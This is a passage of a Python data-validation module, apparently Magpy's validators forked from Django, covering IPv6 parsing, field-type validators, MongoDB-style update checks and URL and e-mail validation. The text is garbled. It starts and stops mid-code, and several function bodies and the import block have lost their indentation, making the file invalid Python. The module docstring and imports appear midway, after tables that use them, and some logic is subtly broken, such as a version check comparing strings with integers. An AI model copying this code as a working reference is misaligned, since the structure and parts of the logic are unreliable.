        stripped = hextet.lstrip('0') or '0'
        hextets[pos] = stripped
        if stripped == '0':
            run_len += 1
            if run_start == -1:
                # Start of a sequence of zeros.
                run_start = pos
            if run_len > best_len:
                # Longest zero sequence seen so far.
                best_len = run_len
                best_start = run_start
        else:
            run_len, run_start = 0, -1

    # Collapse the best run (only worthwhile for two or more hextets).
    if best_len > 1:
        best_end = best_start + best_len
        if best_end == len(hextets):
            # Zeros run to the end of the address.
            hextets.append('')
        hextets[best_start:best_end] = ['']
        if best_start == 0:
            # Zeros start the address.
            hextets.insert(0, '')

    return ":".join(hextets).lower()
def _sanitize_ipv4_mapping(ip_str):
"""
Sanitize IPv4 mapping in a expanded IPv6 address.
This converts ::ffff:0a0a:0a0a to ::ffff:10.10.10.10.
If there is nothing to sanitize, returns an unchanged
string.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The sanitized output string, if applicable.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
# not an ipv4 mapping
return ip_str
hextets = ip_str.split(':')
if '.' in hextets[-1]:
# already sanitized
return ip_str
ipv4_address = "%d.%d.%d.%d" % (
int(hextets[6][0:2], 16),
int(hextets[6][2:4], 16),
int(hextets[7][0:2], 16),
int(hextets[7][2:4], 16),
)
result = ':'.join(hextets[0:6])
result += ':' + ipv4_address
return result
def _unpack_ipv4(ip_str):
"""
Unpack an IPv4 address that was mapped in a compressed IPv6 address.
This converts 0000:0000:0000:0000:0000:ffff:10.10.10.10 to 10.10.10.10.
If there is nothing to sanitize, returns None.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The unpacked IPv4 address, or None if there was nothing to unpack.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
return None
hextets = ip_str.split(':')
return hextets[-1]
def is_valid_ipv6_address(ip_str):
    """Return True if ip_str is a syntactically valid IPv6 address.

    Args:
        ip_str: A string, the IPv6 address.
    Returns:
        A boolean, True if this is a valid IPv6 address.
    """
    # At least one ':' is mandatory.
    if ':' not in ip_str:
        return False
    # Only one '::' shortener is allowed, and never a third colon.
    if ip_str.count('::') > 1 or ':::' in ip_str:
        return False
    # A single colon can neither start nor end an address ('::' may).
    if ip_str.startswith(':') and not ip_str.startswith('::'):
        return False
    if ip_str.endswith(':') and not ip_str.endswith('::'):
        return False
    # More than 7 ':' is never valid (1::2:3:4:5:6:7:8 is invalid).
    if ip_str.count(':') > 7:
        return False
    # Without '::' we need exactly 8 fields (7 colons) -- unless the
    # tail is an IPv4 dotted quad.
    if '::' not in ip_str and ip_str.count(':') != 7:
        if ip_str.count('.') != 3:
            return False
    ip_str = _explode_shorthand_ip_string(ip_str)
    # Every hextet must lie between 0x0 and 0xFFFF; an embedded IPv4
    # part must be the final field and must itself validate.
    hextets = ip_str.split(':')
    for hextet in hextets:
        if hextet.count('.') == 3:
            if hextet != hextets[-1]:
                return False
            try:
                validate_ipv4_address(hextet)
            except ValidationError:
                return False
        else:
            try:
                # A ValueError here means a bad hextet such as 0xzzzz.
                if not 0x0 <= int(hextet, 16) <= 0xFFFF:
                    return False
            except ValueError:
                return False
    return True
def _explode_shorthand_ip_string(ip_str):
    """Expand a shortened IPv6 address to its full 8-hextet form.

    Args:
        ip_str: A string, the IPv6 address.
    Returns:
        A string, the expanded IPv6 address.
    """
    if not _is_shorthand_ip(ip_str):
        # Already in longhand form.
        return ip_str
    # A v4-mapped address keeps the dotted quad as its final field, so
    # only seven hextet slots need filling.
    fill_to = 7 if '.' in ip_str.split(':')[-1] else 8
    halves = ip_str.split('::')
    if len(halves) > 1:
        # Expand the '::' with enough zero hextets to reach fill_to.
        left = halves[0].split(':')
        right = halves[1].split(':')
        missing = fill_to - (len(left) + len(right))
        expanded = left + ['0000'] * missing + right
    else:
        expanded = ip_str.split(':')
    # Left-pad every hextet to four characters and lowercase it.
    return ':'.join(h.rjust(4, '0').lower() for h in expanded)
def _is_shorthand_ip(ip_str):
"""Determine if the address is shortened.
Args:
ip_str: A string, the IPv6 address
Returns:
A boolean, True if the address is shortened.
"""
if ip_str.count('::') == 1:
return True
if list(filter(lambda x: len(x) < 4, ip_str.split(':'))):
return True
return False
def validate_bool(data):
    """Ensure data is a bool (True or False)."""
    if isinstance(data, bool):
        return
    raise ValidationError("Not a bool.")
def validate_long(data):
    """If the data is (or can become) a long
    i.e. a 64 bit integer.

    Fixed for Python 3: `long` no longer exists there, so the original
    body raised an uncaught NameError instead of validating.
    """
    try:
        integer_type = long
    except NameError:
        # Python 3: long was merged into int.
        integer_type = int
    try:
        integer_type(data)
    except (ValueError, TypeError):
        raise ValidationError('Not a long')
def validate_char(data):
    """
    A string field, for small-to medium-sized strings.
    TODO: this will have to become a method to implement limit.

    Fixed for Python 3: module-level `basestring` does not exist
    there, so the original body raised an uncaught NameError.
    """
    try:
        string_types = basestring  # Python 2
    except NameError:
        string_types = (str, bytes)  # Python 3
    if not isinstance(data, string_types):
        raise ValidationError("%s is not a char." % data)
def validate_date(data):
    """Ensure data is a datetime.date (datetime.datetime also passes,
    being a date subclass)."""
    if isinstance(data, datetime.date):
        return
    raise ValidationError("Not a date.")
def validate_datetime(data):
    """Ensure data is a datetime.datetime."""
    if isinstance(data, datetime.datetime):
        return
    raise ValidationError("Not a datetime.")
def validate_decimal(data):
    """Ensure data is a decimal.Decimal."""
    if isinstance(data, Decimal):
        return
    raise ValidationError("Not a decimal.")
def validate_filepath(data):
    """At the moment, this just checks that it is a string.

    Fixed for Python 3: module-level `basestring` does not exist
    there, so the original body raised an uncaught NameError.
    """
    try:
        string_types = basestring  # Python 2
    except NameError:
        string_types = (str, bytes)  # Python 3
    if not isinstance(data, string_types):
        raise ValidationError("Not a filepath.")
def validate_float(data):
    """Ensure data is a float instance (ints are NOT accepted)."""
    if isinstance(data, float):
        return
    raise ValidationError("Not a float.")
def validate_integer(value):
    """Ensure a value is (convertible to) an integer."""
    try:
        int(value)
    except (TypeError, ValueError):
        raise ValidationError('Not an Integer.')
def validate_nullboolean(data):
    """Ensure data is True, False or None."""
    if isinstance(data, bool) or data is None:
        return
    raise ValidationError("Not a nullboolean.")
def validate_postiveinteger(data):
    """Ensure a value is a positive (non-negative) integer.

    NOTE: the function name keeps its historical misspelling
    ('postive') because the DISPATCHER table and callers reference it.
    """
    try:
        valid_int = int(data)
    except (ValueError, TypeError):
        raise ValidationError('Not a positive integer.')
    if valid_int < 0:
        # Fixed typo in the error message: 'Postive' -> 'Positive'.
        raise ValidationError('Positive integer cannot be negative.')
def validate_smallinteger(data):
    """Integer between -32768 and +32767 (2-byte signed range)."""
    try:
        in_range = -32768 <= int(data) <= 32767
    except (ValueError, TypeError):
        raise ValidationError('Not a small integer.')
    if not in_range:
        raise ValidationError('Not a small integer.')
def validate_biginteger(data):
    """Big (8 byte) signed integer."""
    try:
        in_range = -9223372036854775808 <= int(data) <= 9223372036854775807
    except (ValueError, TypeError):
        raise ValidationError('Not a big integer.')
    if not in_range:
        raise ValidationError('Not a big integer.')
def validate_positivesmallinteger(data):
    """Integer between 0 and 32767 inclusive."""
    try:
        in_range = 0 <= int(data) <= 32767
    except (ValueError, TypeError):
        raise ValidationError('Not a positive small integer.')
    if not in_range:
        raise ValidationError('Not a positive small integer.')
def validate_text(data):
    """Text of unlimited size.

    Fixed for Python 3: module-level `basestring` does not exist
    there, so the original body raised an uncaught NameError.
    NOTE(review): the error message says "Not a char." -- kept
    byte-identical for backward compatibility.
    """
    try:
        string_types = basestring  # Python 2
    except NameError:
        string_types = (str, bytes)  # Python 3
    if not isinstance(data, string_types):
        raise ValidationError("Not a char.")
def validate_time(data):
    """Ensure data is a datetime.time."""
    if isinstance(data, datetime.time):
        return
    raise ValidationError("Not a time.")
def validate_url(data):
    """Validate that data looks like a URL (no existence check)."""
    URLValidator()(data)
def validate_verified_url(data):
    """Validate a URL and verify that it actually exists.

    Read the warnings on URLValidator before using this."""
    URLValidator(verify_exists=True)(data)
def validate_xml(data):
    """Check that data is well-formed XML.

    This is pretty lenient; it does not check validity against a DTD
    or schema.
    """
    try:
        xml.parsers.expat.ParserCreate().Parse(data)
    except xml.parsers.expat.ExpatError:
        raise ValidationError("Not well formed.")
def validate_dict(data):
    """Cheap duck-typed check that data behaves like a dict."""
    try:
        data.keys()
    except AttributeError:
        raise ValidationError('Not an dict.')
def validate_list(data):
    """Duck-typed check that data behaves like a list (has insert)."""
    try:
        getattr(data, 'insert')
    except AttributeError:
        raise ValidationError('Not a list.')
def validate_file(data):
    """File validation is not yet implemented."""
    raise NotImplementedError(data)
def validate_image(data):
    """Image validation is not yet implemented."""
    raise NotImplementedError(data)
def validate_embedded(data,
                      embedded_models,
                      handle_none=False):
    """Check that an embedded instance validates against its model.

    The model to use is looked up via the instance's '_model' key in
    the embedded_models registry.
    """
    try:
        # Either a missing '_model' key or an unregistered model name
        # surfaces as a KeyError here.
        model = embedded_models[data['_model']]
    except KeyError:
        raise ValidationError('Missing _model key on embedded data.')
    validate_model_instance(model,
                            data,
                            handle_none=handle_none,
                            embedded_models=embedded_models)
def validate_embedded_list(data,
                           embedded_models,
                           handle_none=False):
    """Check that every embedded instance in the list validates."""
    # Duck-typed list check: must support insert.
    try:
        data.insert
    except AttributeError:
        raise ValidationError('Not an embedded list.')
    for embedded_instance in data:
        try:
            # Missing '_model' key or unregistered model name both
            # surface as a KeyError here.
            model = embedded_models[embedded_instance['_model']]
        except KeyError:
            raise ValidationError('Missing _model key on embedded data.')
        validate_model_instance(model,
                                embedded_instance,
                                handle_none=handle_none,
                                embedded_models=embedded_models)
def validate_set_modifier(model_validator, model, field, field_type, value):
    """$set assigns value to field; every datatype is allowed, so
    simply delegate to the field-type validator."""
    return model_validator.validate_field(field_type, value)
def validate_unset_modifier(model_validator, model, field, field_type, value):
    """$unset deletes the given field.

    Only fields explicitly marked required=False may be unset; an
    absent 'required' flag counts as required.
    """
    if model[field].get('required', True) != False:
        raise ValidationError(
            'Field %s cannot be unset because it is required.' % field,
            code='invalid')
def validate_inc_modifier(model_validator, model, field, field_type, value):
    """$inc increments field by the number value if field is present
    in the object, otherwise sets field to the number value.
    This can also be used to decrement by using a negative value.

    The increment amount must be a number and the target field must be
    of a numeric type.
    """
    # The value itself must be a number.
    if not isinstance(value, Number):
        raise ValidationError(
            'Cannot increment by value '
            '%s because it is not a number.' % value,
            code='invalid')
    # The target field must be of a numeric type.
    if field_type not in (
            'BigInteger', 'Decimal', 'Float', 'Integer', 'LongInteger',
            'PositiveInteger', 'PositiveSmallInteger', 'SmallInteger'):
        # Fixed message: the original implicit string concatenation
        # lacked a space between the field name and 'because'.
        raise ValidationError(
            'Cannot increment field %s '
            'because it is not a numeric type.' % field,
            code='invalid')
    # The original if/else performed the identical call in both
    # branches, so the branch on positive types was dead code.  The
    # magnitude is validated so that negative increments remain legal
    # for positive field types.
    model_validator.validate_field(field_type, abs(value))
def validate_array_modifier(model_validator, model, field, field_type, value):
    """Shared check for the list modifiers ($push, $pop, $pull, ...):
    the target field must be a list type."""
    if field_type in ('EmbeddedList', 'List'):
        return
    raise ValidationError(
        'Field %s is not a list type.' % field,
        code='invalid')
def validate_rename_modifier(model_validator, model, field, field_type, value):
    """$rename would rename 'old_field_name' to 'new_field_name',
    but it is not supported: this always raises."""
    raise ValidationError(
        'Rename is currently not supported.',
        code='invalid')
def validate_bitwise_modifier(model_validator, model, field, field_type, value):
    """$bit does a bitwise update of field; only integer types allowed."""
    integer_types = (
        'BigInteger', 'Integer', 'LongInteger',
        'PositiveInteger', 'PositiveSmallInteger', 'SmallInteger')
    if field_type not in integer_types:
        raise ValidationError(
            'Field %s is not an integer type.' % field,
            code='invalid')
# Maps MongoDB-style update operators to the validator that checks
# their arguments; consumed by ModelValidator.validate_modification.
MODIFICATION_DISPATCHER = {
    '$set': validate_set_modifier,
    '$unset': validate_unset_modifier,
    '$inc': validate_inc_modifier,
    '$push': validate_array_modifier,
    '$pushAll': validate_array_modifier,
    '$addToSet': validate_array_modifier,
    '$each': validate_array_modifier,
    '$pop': validate_array_modifier,
    '$pull': validate_array_modifier,
    '$pullAll': validate_array_modifier,
    '$rename': validate_rename_modifier,
    '$bit': validate_bitwise_modifier
    }
# Default (field type name -> validator callable) table used by
# ModelValidator when no explicit dispatcher is supplied.
DISPATCHER = (
    ('Boolean', validate_bool),
    ('BigInteger', validate_biginteger),
    ('Char', validate_char),
    ('CommaSeparatedInteger', validate_comma_separated_integer_list),
    ('Date', validate_date),
    ('DateTime', validate_datetime),
    ('Decimal', validate_decimal),
    ('Dict', validate_dict),
    ('Email', validate_email),
    ('Embedded', validate_embedded),
    ('EmbeddedList', validate_embedded_list),
    ('File', validate_file),
    ('FilePath', validate_filepath),
    ('Float', validate_float),
    ('Image', validate_image),
    ('Integer', validate_integer),
    ('IPAddress', validate_ipv46_address),
    ('IP4Address', validate_ipv4_address),
    ('IP6Address', validate_ipv6_address),
    ('List', validate_list),
    ('LongInteger', validate_long),
    ('NullBoolean', validate_nullboolean),
    ('PositiveInteger', validate_postiveinteger),
    ('PositiveSmallInteger', validate_positivesmallinteger),
    ('Slug', validate_slug),
    ('SmallInteger', validate_smallinteger),
    ('Text', validate_text),
    ('Time', validate_time),
    ('URL', validate_url),
    ('VerifiedURL', validate_verified_url),
    ('XML', validate_xml),
    )
# More Python3.
"""Validation code, much of it originally forked from Django."""
from __future__ import print_function
import six
# Import half of the friggin stdlib :)
import platform
import re
try:
# Python 2
from urllib2 import Request, OpenerDirector, \
HTTPErrorProcessor, UnknownHandler, HTTPHandler, \
HTTPDefaultErrorHandler, FTPHandler, HTTPSHandler
from urllib import quote
from urlparse import urlsplit, urlunsplit
except ImportError:
# Python 3
from urllib.request import Request, OpenerDirector, \
HTTPErrorProcessor, UnknownHandler, HTTPHandler, \
HTTPDefaultErrorHandler, FTPHandler, HTTPSHandler
from urllib.parse import quote, urlsplit, urlunsplit
import operator
import types
import datetime
from decimal import Decimal
import xml.parsers.expat
from numbers import Number
from functools import reduce
def validate_model_instance(model,
                            instance,
                            handle_none=False,
                            embedded_models=None,
                            callback=None):
    """Validate a single instance.
    Required Arguments:
    * model - the model definition (dictionary or dictionary-like object)
    * instance - the instance (dictionary or dictionary-like object)
    Optional Arguments:
    * handle_none - set to True to allow None to always be valid data,
    default is False. This can be useful in dealing data that came
    (at least at one time) from SQL data.
    * embedded_models - a dictionary of model definitions, where the key is
    the model name, value is the model definition. This dictionary is used
    to validate embedded instances.
    * callback - an optional callback to run after validation; it is
    called as callback(valid, instance) and suppresses the exception.
    """
    validator = ModelValidator(model,
                               handle_none=handle_none,
                               embedded_models=embedded_models)
    if not callback:
        # No callback: let any ValidationError propagate.
        validator.validate_instance(instance)
        return
    try:
        validator.validate_instance(instance)
    except ValidationError:
        callback(False, instance)
    else:
        callback(True, instance)
def parse_instance(instance, result_set):
    """Recursively add every model name an instance uses to result_set."""
    for key, value in six.iteritems(instance):
        if key == '_model':
            result_set.add(value)
        if isinstance(value, dict):
            # Nested embedded instance: record its model and recurse.
            if '_model' in value:
                result_set.add(value['_model'])
            parse_instance(value, result_set)
        elif isinstance(value, list):
            # Embedded list: recurse into each dict element.
            for element in value:
                if isinstance(element, dict):
                    parse_instance(element, result_set)
def validate_modification(model,
                          modification,
                          handle_none=False,
                          embedded_models=None,
                          callback=None):
    """Validate a modification document against a model.

    Assumes the existing version has already been through validation.
    When a callback is given it is invoked as
    callback(valid, modification) and its result returned; otherwise a
    ValidationError propagates.
    TODO: support embedded instances.
    """
    validator = ModelValidator(model,
                               handle_none=handle_none,
                               embedded_models=embedded_models)
    try:
        validator.validate_modification(model, modification)
    except ValidationError:
        if not callback:
            raise
        return callback(False, modification)
    if callback:
        return callback(True, modification)
class ModelValidator(object):
    """Validates instances according to a model.

    A model is a dict mapping field names to field definitions (each a
    dict with at least a 'field' type name, optionally 'required' and
    'resource').  Bookkeeping keys on models and instances are ignored.
    """

    # Model-definition keys that are metadata rather than fields.
    _MODEL_META_KEYS = frozenset(
        ('modeldescription', '_id', '_permissions', '_view', '_model'))
    # Instance keys that are bookkeeping rather than field data.
    _INSTANCE_META_KEYS = frozenset(
        ('_id', '_meta', '_view', '_versional_comment',
         '_operation', '_permissions'))

    def __init__(self,
                 model,
                 handle_none=False,
                 dispatcher=None,
                 embedded_models=None):
        """@param model: the model definition dict
        @param handle_none: if True, None is always valid field data
        @param dispatcher: optional (field type -> validator) mapping;
            defaults to a copy of DISPATCHER
        @param embedded_models: registry used for Embedded fields
        """
        self.dispatch = dispatcher if dispatcher else dict(DISPATCHER)
        self.model = model
        # Only real field names take part in validation.
        self.model_keys = set(model.keys()) - self._MODEL_META_KEYS
        self.handle_none = handle_none
        self.embedded_models = embedded_models

    def do_dispatch(self, field_type, field_data):
        """Invoke the validator registered for field_type."""
        # Embedded fields additionally need the model registry.
        if field_type in ('Embedded', 'EmbeddedList'):
            return self.dispatch[field_type](field_data,
                                             self.embedded_models)
        self.dispatch[field_type](field_data)

    def validate_field(self, field_type, field_data):
        """Validate field_data against field_type.

        When handle_none is set, None is accepted for any field type.
        """
        try:
            self.do_dispatch(field_type, field_data)
        except ValidationError:
            if not (field_data is None and self.handle_none):
                raise

    def validate_instance(self, instance):
        """Validate that the instance meets the requirements of the model.

        Raises OrphanedInstance when '_model' is missing, otherwise
        InvalidFields / MissingFields / ValidationError on failure.
        Returns None on success.
        """
        instance_keys = set(instance.keys())
        if '_model' not in instance_keys:
            raise OrphanedInstance('The instance does not have a model key.')
        instance_keys.discard('_model')
        instance_keys -= self._INSTANCE_META_KEYS
        # Sanity checks
        self.check_for_unknown_fields(instance_keys)
        self.check_for_missing_fields(instance_keys)
        # Check each remaining field's data against its declared type.
        # (The original bound a throwaway list comprehension to an
        # unused variable; a plain loop expresses the side effect.)
        try:
            for field in instance_keys:
                self.validate_field(self.model[field]['field'],
                                    instance[field])
        except TypeError:
            print("Died on %s " % instance['_id'])
            print("Perhaps invalid model?")
            raise
        # If they are all valid, then do nothing
        return None

    def check_for_unknown_fields(self, instance_keys):
        """Raise InvalidFields if the instance has fields the model lacks."""
        extra_fields = instance_keys - self.model_keys
        if extra_fields:
            if len(extra_fields) == 1:
                raise InvalidFields(extra_fields.pop())
            raise InvalidFields(tuple(extra_fields))

    def check_for_missing_fields(self, instance_keys):
        """Raise MissingFields for required model fields the instance lacks.

        A field definition without a 'required' flag counts as required.
        """
        missing_fields = self.model_keys - instance_keys
        if not missing_fields:
            return
        awol = set()
        for field in missing_fields:
            try:
                required = self.model[field]['required']
            except KeyError:
                # No explicit flag: treat the field as required.
                awol.add(field)
            else:
                if required == True:
                    awol.add(field)
        if awol:
            if len(awol) == 1:
                raise MissingFields(awol.pop())
            raise MissingFields(tuple(awol))

    def validate_modification(self, model, modification):
        """Validate a MongoDB-style modification document ($set etc.)."""
        for modifier, fields in six.iteritems(modification):
            validator = MODIFICATION_DISPATCHER[modifier]
            for dotted_field, value in six.iteritems(fields):
                field, field_type = self.get_field(dotted_field, model)
                validator(self, model, field, field_type, value)

    def get_field(self, field, model):
        """Resolve a possibly dotted field path to (field, field_type).

        A plain name is looked up directly on the model; a dotted path
        walks into the embedded model registry, skipping '$'
        positional components.
        """
        if '.' not in field:
            return field, model[field]['field']
        parts = field.split('.')
        field_name = parts.pop(-1)
        if field_name == '$':
            field_name = parts.pop(-1)
        model_name = parts.pop(-1)
        if model_name == '$':
            model_name = parts.pop(-1)
        if model_name in self.embedded_models:
            if field_name in self.embedded_models[model_name]:
                field = self.embedded_models[model_name][field_name]
        elif model_name in model:
            # 'resource' may alias the embedded model's real name.
            real_model_name = model[model_name].get('resource', model_name)
            field = self.embedded_models[real_model_name][field_name]
        # NOTE(review): if neither branch rebinds 'field' it is still
        # the dotted string and field['field'] below fails with
        # TypeError -- presumably unreachable for valid input; confirm.
        field_type = field['field']
        return field, field_type
def get_all_modification_modelnames(model, modification):
    """Get all model names referenced by a modification document.

    Dotted field paths (e.g. 'children.$.name') are split and every
    component except the final field name is treated as a candidate
    model/container name.

    Returns a pair (real_model_names, unknown_keys) as lists.
    """
    # The original also built a 'tree' list here that was never read;
    # that dead accumulator has been removed.
    candidates = set()
    for _modifier, fields in six.iteritems(modification):
        for fieldname in fields:
            if '.' in fieldname:
                parts = [part for part in fieldname.split('.')
                         if part != '$']
                candidates.update(parts[:-1])
    real_models = set()
    unknown_keys = set()
    for model_name in candidates:
        # Maybe it is a top level field
        if model_name in model:
            # 'resource' may alias the real model name.
            real_models.add(model[model_name].get('resource', model_name))
            continue
        if isinstance(model_name, int):
            # NOTE(review): split() yields strings, so this branch can
            # never fire; positional indices arrive as e.g. '3'.  Kept
            # for behavioural compatibility -- confirm the intent.
            continue
        # Not sure what it is yet.
        unknown_keys.add(model_name)
    # Get rid of anything we know about.
    # Maybe later we do something else
    unknown_keys -= real_models
    return list(real_models), list(unknown_keys)
class InvalidInstance(Exception):
    """Raised when an instance fails to meet its model's requirements.

    Catch this superclass when you do not care why an instance is
    invalid -- it covers all the subclasses below."""
class InvalidFields(InvalidInstance):
    """Raised when an instance carries field(s) not defined in the model."""
class MissingFields(InvalidInstance):
    """Raised when an instance lacks field(s) the model requires."""
class OrphanedInstance(InvalidInstance):
    """Raised when an instance has no '_model' key associating it
    with a model."""
# User-Agent header sent when URLValidator(verify_exists=True) probes a URL.
URL_VALIDATOR_USER_AGENT = 'Django (http://www.djangoproject.com/)'
# Dictionary key under which non-field-specific errors are collected.
NON_FIELD_ERRORS = '__all__'
class ValidationError(Exception):
    """An error while validating data."""
    def __init__(self, message, code=None, params=None):
        """
        ValidationError can be passed any object that can be printed (usually
        a string), a list of objects or a dictionary.
        """
        super(ValidationError, self).__init__(message)
        if isinstance(message, dict):
            # Keep the original mapping, then flatten it into a list
            # so the list branch below normalises the messages.
            self.message_dict = message
            # Reduce each list of messages into a single list.
            message = reduce(operator.add, message.values())
        if isinstance(message, list):
            self.messages = [force_unicode(msg) for msg in message]
        else:
            # NOTE: self.code and self.params are only set on this
            # scalar-message path; dict/list errors never carry them.
            self.code = code
            self.params = params
            message = force_unicode(message)
            self.messages = [message]
    def __str__(self):
        # This is needed because, without a __str__(), printing an exception
        # instance would result in this:
        # AttributeError: ValidationError instance has no attribute 'args'
        # See http://www.python.org/doc/current/tut/node10.html#handling
        if hasattr(self, 'message_dict'):
            return repr(self.message_dict)
        return repr(self.messages)
    def __repr__(self):
        if hasattr(self, 'message_dict'):
            return 'ValidationError(%s)' % repr(self.message_dict)
        return 'ValidationError(%s)' % repr(self.messages)
    def update_error_dict(self, error_dict):
        """Update the error dict with messages."""
        if hasattr(self, 'message_dict'):
            if error_dict:
                # Merge per-field message lists into the caller's dict.
                for k, value in self.message_dict.items():
                    error_dict.setdefault(k, []).extend(value)
            else:
                error_dict = self.message_dict
        else:
            # Scalar/list errors are not tied to a particular field.
            error_dict[NON_FIELD_ERRORS] = self.messages
        return error_dict
# These values, if given to validate(), will trigger the self.required check.
# Note that 0 and 0.0 are deliberately NOT treated as empty.
EMPTY_VALUES = (None, '', [], (), {})
class RegexValidator(object):
    """
    A validator is a callable that takes a value and raises a
    ValidationError if it doesn't meet some criteria.
    Validators can be useful for re-using validation logic
    between different types of fields.
    Parameters:
    regex -- If not None, overrides regex.
    Can be a regular expression string or a pre-compiled regular expression.
    message -- If not None, overrides message.
    code -- If not None, overrides code.
    regex
    The regular expression pattern to search for the provided value,
    or a pre-compiled regular expression.
    Raises a ValidationError with message and code if no match is found.
    By default, matches any string (including an empty string).
    message
    The error message used by ValidationError if validation fails.
    Defaults to "Enter a valid value".
    code
    The error code used by ValidationError if validation fails.
    Defaults to "invalid".
    """
    regex = ''
    message = u'Enter a valid value.'
    code = 'invalid'
    def __init__(self, regex=None, message=None, code=None):
        if regex is not None:
            self.regex = regex
        if message is not None:
            self.message = message
        if code is not None:
            self.code = code
        # Determine the native string types WITHOUT assigning to the
        # name 'basestring' in this scope.  The original wrote
        # `basestring = (str, bytes)` in the except branch, which made
        # 'basestring' local to the whole function: the bare lookup
        # then always raised UnboundLocalError (a NameError subclass),
        # so the Python 2 builtin was silently shadowed by the
        # fallback tuple and unicode patterns were mis-detected.
        try:
            string_types = basestring  # Python 2
        except NameError:
            string_types = (str, bytes)  # Python 3
        # Compile the regex if it was not passed pre-compiled.
        if isinstance(self.regex, string_types):
            self.regex = re.compile(self.regex)
    def __call__(self, value):
        """
        Validates that the input matches the regular expression.
        """
        if not self.regex.search(smart_unicode(value)):
            raise ValidationError(self.message, code=self.code)
class URLValidator(RegexValidator):
    """
    A RegexValidator that ensures a value looks like a URL
    and optionally verifies that the URL actually exists
    (i.e., doesn't return a 404 status code).
    Raises an error code of 'invalid' if it doesn't look like a URL,
    and a code of 'invalid_link' if it doesn't exist.
    Parameters:
    verify_exists -- Sets verify_exists. Defaults to False.
    validator_user_agent -- Sets validator_user_agent.
    Defaults to URL_VALIDATOR_USER_AGENT or,
    if that setting is set to a null value,
    "Django (http://www.djangoproject.com/)".
    validator_user_agent
    If verify_exists is True, Django uses this value as
    the "User-agent" for the request.
    verify_exists
    If set to True, this validator checks that the URL actually exists
    and resolves, by issuing a request to it.
    This is really handy, but should only be used for trusted users,
    e,g. staff-only mode.
    If you allow public-facing code to use this, there is potential for
    a denial of service attack.
    This option is to be used between consenting adults only!
    This problem is particularly pronounced in Python 2.5 and below
    since the underlying socket libraries in Python do not have a timeout.
    This can manifest as a security problem in three different ways:
    1. An attacker can supply a slow-to-respond URL.
    Each request will tie up a server process for a period of time;
    if the attacker is able to make enough requests,
    they can tie up all available server processes.
    2. An attacker can supply a URL under his or her control,
    and which will simply hold an open connection indefinitely.
    Due to the lack of timeout, the Django process attempting to
    verify the URL will similarly spin indefinitely.
    Repeating this can easily tie up all available server processes.
    3. An attacker can supply a URL under his or her control which
    not only keeps the connection open, but also sends an unending
    stream of random garbage data.
    This data will cause the memory usage of the Django process
    (which will hold the response in memory) to grow without bound,
    thus consuming not only server processes but also server memory.
    Note, Python 2.5 is not actually supported by Magpy because of the
    Python 3 compatibility.
    For Python versions 2.6 and above, which support setting a timeout,
    a timeout of ten seconds will be set;
    Therefore only use in trusted contexts and where the utility
    is sufficient to warrant the potential risks it creates.
    """
    # Scheme, then domain / localhost / IPv4, optional port, optional
    # path or query string.
    regex = re.compile(
        r'^(?:http|ftp)s?://' # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)'
        r'+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
        r'localhost|' # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
        r'(?::\d+)?' # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    def __init__(self, verify_exists=False,
                 validator_user_agent=URL_VALIDATOR_USER_AGENT):
        super(URLValidator, self).__init__()
        self.verify_exists = verify_exists
        self.user_agent = validator_user_agent
    def __call__(self, value):
        # First pass: the plain regex.  On failure, retry with the
        # domain part idna-encoded (IDN support) before giving up.
        try:
            super(URLValidator, self).__call__(value)
        except ValidationError as excptn:
            # Trivial case failed. Try for possible IDN domain
            if value:
                value = smart_unicode(value)
                scheme, \
                netloc, \
                path, \
                query, \
                fragment = urlsplit(value)
                try:
                    netloc = netloc.encode('idna') # IDN -> ACE
                except UnicodeError: # invalid domain part
                    raise excptn
                url = urlunsplit((scheme,
                                  netloc,
                                  path,
                                  query,
                                  fragment))
                super(URLValidator, self).__call__(url)
            else:
                raise
        else:
            url = value
        # Optional (deprecated) existence probe via an HTTP HEAD
        # request -- see the security warnings in the class docstring.
        if self.verify_exists:
            import warnings
            warnings.warn(
                "The URLField verify_exists argument has intractable security "
                "and performance issues. Accordingly, it has been deprecated.",
                DeprecationWarning
                )
            headers = {
                "Accept": "text/xml,application/xml,application/xhtml+xml,"
                "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
                "Accept-Language": "en-us,en;q=0.5",
                "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
                "Connection": "close",
                "User-Agent": self.user_agent,
                }
            url = url.encode('utf-8')
            # Quote characters from the unreserved set, refs #16812
            url = quote(url, "!*'();:@&=+$,/?#[]")
            broken_error = ValidationError(
                u'This URL appears to be a broken link.',
                code='invalid_link')
            try:
                req = Request(url, None, headers)
                req.get_method = lambda: 'HEAD'
                #Create an opener that does not support local file access
                opener = OpenerDirector()
                #Don't follow redirects, but don't treat them as errors either
                error_nop = lambda *args, **kwargs: True
                http_error_processor = HTTPErrorProcessor()
                http_error_processor.http_error_301 = error_nop
                http_error_processor.http_error_302 = error_nop
                http_error_processor.http_error_307 = error_nop
                handlers = [UnknownHandler(),
                            HTTPHandler(),
                            HTTPDefaultErrorHandler(),
                            FTPHandler(),
                            http_error_processor]
                try:
                    import ssl
                except ImportError:
                    # Python isn't compiled with SSL support
                    pass
                else:
                    handlers.append(HTTPSHandler())
                list(map(opener.add_handler, handlers))
                if platform.python_version_tuple() >= (2, 6):
                    opener.open(req, timeout=10)
                else:
                    opener.open(req)
            except ValueError:
                raise ValidationError(u'Enter a valid URL.', code='invalid')
            except: # urllib2.URLError, httplib.InvalidURL, etc.
                raise broken_error
class EmailValidator(RegexValidator):
    """
    A RegexValidator instance that ensures a value looks like an email address.
    """
    def __call__(self, value):
        try:
            super(EmailValidator, self).__call__(value)
        except ValidationError as excptn:
            # The plain regex failed; the domain part may be an IDN
            # that only matches after idna-encoding.
            if not value or u'@' not in value:
                raise
            parts = value.split(u'@')
            try:
                parts[-1] = parts[-1].encode('idna')
            except UnicodeError:
                raise excptn
            super(EmailValidator, self).__call__(u'@'.join(parts))
# RFC 2822-ish e-mail pattern: dot-atom or quoted-string local part,
